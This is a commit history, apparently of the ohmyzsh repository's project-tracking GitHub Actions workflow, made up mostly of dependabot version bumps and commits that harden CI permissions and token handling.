3fd2331ae8
chore(deps): bump step-security/harden-runner from 2.14.2 to 2.15.0 ( #13601 )
...
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2 weeks ago
116be8badd
chore(deps): bump step-security/harden-runner from 2.14.1 to 2.14.2 ( #13557 )
...
Bumps [step-security/harden-runner](https://github.com/step-security/harden-runner ) from 2.14.1 to 2.14.2.
- [Release notes](https://github.com/step-security/harden-runner/releases )
- [Commits](e3f713f2d8...5ef0c079ce
1 month ago
9df4ea095f
chore(deps): bump step-security/harden-runner from 2.14.0 to 2.14.1 ( #13547 )
...
Bumps [step-security/harden-runner](https://github.com/step-security/harden-runner ) from 2.14.0 to 2.14.1.
- [Release notes](https://github.com/step-security/harden-runner/releases )
- [Commits](20cf305ff2...e3f713f2d8
1 month ago
1fee750c3b
chore(deps): bump step-security/harden-runner from 2.13.3 to 2.14.0 ( #13483 )
...
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
3 months ago
0ebeae78d0
chore(deps): bump actions/create-github-app-token from 2.2.0 to 2.2.1 ( #13470 )
...
Bumps [actions/create-github-app-token](https://github.com/actions/create-github-app-token ) from 2.2.0 to 2.2.1.
- [Release notes](https://github.com/actions/create-github-app-token/releases )
- [Commits](7e473efe3c...29824e69f5
3 months ago
3b66f643e4
chore(deps): bump step-security/harden-runner from 2.13.2 to 2.13.3 ( #13471 )
...
Bumps [step-security/harden-runner](https://github.com/step-security/harden-runner ) from 2.13.2 to 2.13.3.
- [Release notes](https://github.com/step-security/harden-runner/releases )
- [Commits](95d9a5deda...df199fb7be
3 months ago
beadd56dd7
chore(deps): bump actions/create-github-app-token from 2.1.4 to 2.2.0 ( #13440 )
...
Bumps [actions/create-github-app-token](https://github.com/actions/create-github-app-token ) from 2.1.4 to 2.2.0.
- [Release notes](https://github.com/actions/create-github-app-token/releases )
- [Commits](6701853927...7e473efe3c
4 months ago
18d0a63df8
chore(deps): bump step-security/harden-runner from 2.13.1 to 2.13.2 ( #13414 )
...
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
4 months ago
242e2faa51
ci: improve security in project.yml workflow ( #13329 )
...
There is no inherent security vulnerability in the workflow, but there were
certain practices that increased latent risk. In this commit, we:
- Explicitly bind app token for each step that needs it, instead of setting it for
all steps after "Store app token"
- Refactor "classify" step, to not rely on files passed around, and instead uses
only awk script.
- Remove all instances of template injection within `run` scripts. There was nothing
dangerous, but the practice is unsafe.
- Sanitize all unwanted characters from PR plugin and theme names.
References: W2M1-06 W2M1-07
6 months ago
7f3d8a34e2
ci: Harden GitHub Actions [StepSecurity] ( #13318 )
6 months ago
5c804257ce
ci: use `actions/create-github-app-token` ( #13233 )
8 months ago
544eb17e33
ci(project): use ohmyzsh's bot credentials
2 years ago
1342459b15
ci: fix update of plugin or theme fields
...
See [1] for the reference of value field (ProjectV2FieldValue type),
and [2] for sample application code.
[1] https://docs.github.com/en/graphql/reference/input-objects#projectv2fieldvalue
[2] https://docs.github.com/en/enterprise-cloud@latest/issues/planning-and-tracking-with-projects/automating-your-project/automating-projects-using-actions#example-workflow-authenticating-with-a-github-app
3 years ago
239e2f9fcd
ci: migrate to ProjectV2 GraphQL API ( #11311 )
3 years ago
065f5ffc5a
ci: harden permissions for GitHub Workflows ( #11174 )
...
* build: harden main.yml permissions
Signed-off-by: Alex <aleksandrosansan@gmail.com>
* build: harden project.yml permissions
Signed-off-by: Alex <aleksandrosansan@gmail.com>
* Update project.yml
The permissions are not necessary, because a separate token is used `GITHUB_TOKEN: ${{ secrets.PROJECT_TOKEN }}`
3 years ago
4d9e5ce9a7
ci(project): sort issues and PRs when reopened
4 years ago
ebfd7cb219
ci: cancel current runs on new trigger
4 years ago
b481955761
ci(project): fix .list files not found error
4 years ago
0ca2e48ee8
ci(project): fix `gh pr view` call to use ohmyzsh repository
4 years ago
63345c4e5d
ci: disable GitHub Actions on forks
4 years ago
512839ef78
chore: simplify project GitHub Action
4 years ago
9dd1dc49d9
chore: simplify `GITHUB_TOKEN` env in project GitHub Action
4 years ago
121ee818a5
chore: I'm dumb af
4 years ago
dd7f0f2211
chore: let's try again
4 years ago
17c52ccfc9
chore: look ma no auth!
4 years ago
861e7e24a3
chore: please work
4 years ago
1d35b30461
chore: fix auth in Project tracking Action
4 years ago
95a66532d1
chore: use GITHUB_TOKEN auth for Project Beta GitHub Action
4 years ago
d1c07f9569
chore: add Projects Beta GitHub Action
4 years ago
dependabot[bot]
Marc Cornellà
StepSecurity Bot
Carlo Sala
Marc Cornellà
Lennart Ochel
Alex